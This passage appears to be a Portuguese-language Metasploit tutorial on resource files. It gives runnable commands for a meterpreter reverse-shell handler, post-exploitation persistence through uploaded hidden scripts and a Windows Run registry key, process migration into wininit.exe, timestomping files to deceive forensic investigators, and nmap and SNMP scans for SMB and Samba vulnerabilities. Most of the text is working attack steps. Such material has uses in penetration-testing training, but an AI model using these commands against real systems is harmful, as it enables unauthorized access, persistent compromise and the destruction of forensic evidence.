run   : msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/autoruncommands.rc' E
desta forma só precisamos de configurar o 'autorunscript' para apontar para o nosso arquivo de recursos, de modo que toda a vez que o manipulador (multi-handler) abre uma sessão irá executar todos os modulos escritos dentro do arquivo 'autoruncommands.rc'



O exemplo a seguir mostra como podemos persistir uma carga útil (payload) em post-exploração
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch Post-Auto.rc
echo 'sysinfo' >> Post-Auto.rc
echo 'run migrate -n wininit.exe' >> Post-Auto.rc
echo 'upload /var/www/powershell.bat C:\\windows\\system32\\powershell.bat' >> Post-Auto.rc
echo 'upload /var/www/hidden.vbs C:\\windows\\system32\\hidden.vbs' >> Post-Auto.rc
echo 'reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v persistence -d "C:\windows\system32\hidden.vbs"' >> Post-Auto.rc
echo 'reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' >> Post-Auto.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   :  msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/Post-Auto.rc' E



Neste proximo exemplo vamos usar o nmap para escanear a nossa rede local em busca de hospedeiros vivos e exportar o relatorio em (.xml) formato, depois vamos construir um arquivo de recurso (msfdb.rc) para podermos exportar o arquivo xml para a base de dados do metasploit, para os hospedeiros encontrados poderem ser usados no metasploit.
escannear usando o nmap:
nmap -sV -Pn -p 1-1000 -O --open -oX /root/Random-Hosts.xml 192.168.1.0/24
contruindo resource file:
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch msfdb.rc
echo 'db_import /root/Random-Hosts.xml' >> /root/msfdb.rc
echo 'hosts' >> /root/msfdb.rc
echo 'sevices' >> /root/msfdb.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
correr metasploit:
service metasploit start
msfconsole -r /root/msfdb.rc
limpar database:
msf > hosts -d
msf > services -d



As vezes no post-exploração precissamos de encobrir os nossos passos no systema alvo para enganar peritos forensicos, uma maneira de fazer isso é manipular o timestomp (mace) de um arquivo ou de um directorio (recursive) no exemplo a seguir vamos fazer o upload de um arquivo para o hospedeiro de destino e mudar o seu valor mace para outra data/hora para que o arquivo pareça ter sido criado/acessado no ano 2013, a flag (-r) permite-nos mudar o mace de todos os arquivos dentro de um directorio.
----------------------------------------------------------------------------------------------------------------------------------------------------------
touch mace.rc
echo 'run migrate -n wininit.exe' >> mace.rc
echo 'upload /var/www/powershell.ps1 %temp\\powershell.ps1%' >> mace.rc
echo 'timestomp -r %temp% "21/01/2013 23:26:35"' >> mace.rc
----------------------------------------------------------------------------------------------------------------------------------------------------------
run   : meterpreter > resource /root/mace.rc



O arquivo de recurso seguinte (scanner.rc) requer que o usuário defina RHOSTS globalmente usando: setg RHOSTS 192.168.1.68 (ip alvo) antes de lançar o resource file, e ele se usa do commando 'db_nmap' para salvar o scan feito na base de dados do metasploit. na tag <ruby> usamos o nmap para escannear por vulnerabilidades no protocol smb e samba que serão guardados em 'services' e 'vulns', depois da tag </ruby> o resource file vai se usar dos resultados contidos na DB para correr modulos de post-exploração.
----------------------------------------------------------------------------------------------------------------------------------------------------------
<ruby>
run_single("db_nmap -sU -sS -Pn -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")
run_single("services #{framework.datastore['RHOSTS']}")
run_single("vulns #{framework.datastore['RHOSTS']}")
</ruby>
use auxiliary/scanner/snmp/snmp_enum
run
use auxiliary/scanner/snmp/snmp_enumusers
run
use auxiliary/scanner/snmp/snmp_enumshares
run
----------------------------------------------------------------------------------------------------------------------------------------------------------
antes do resource file ser lançado:  msf > setg RHOSTS <target ip>
run  resource file:  msf > resource scanner.rc
unset global var: msf > unsetg RHOSTS
clean msf database: msf > hosts -d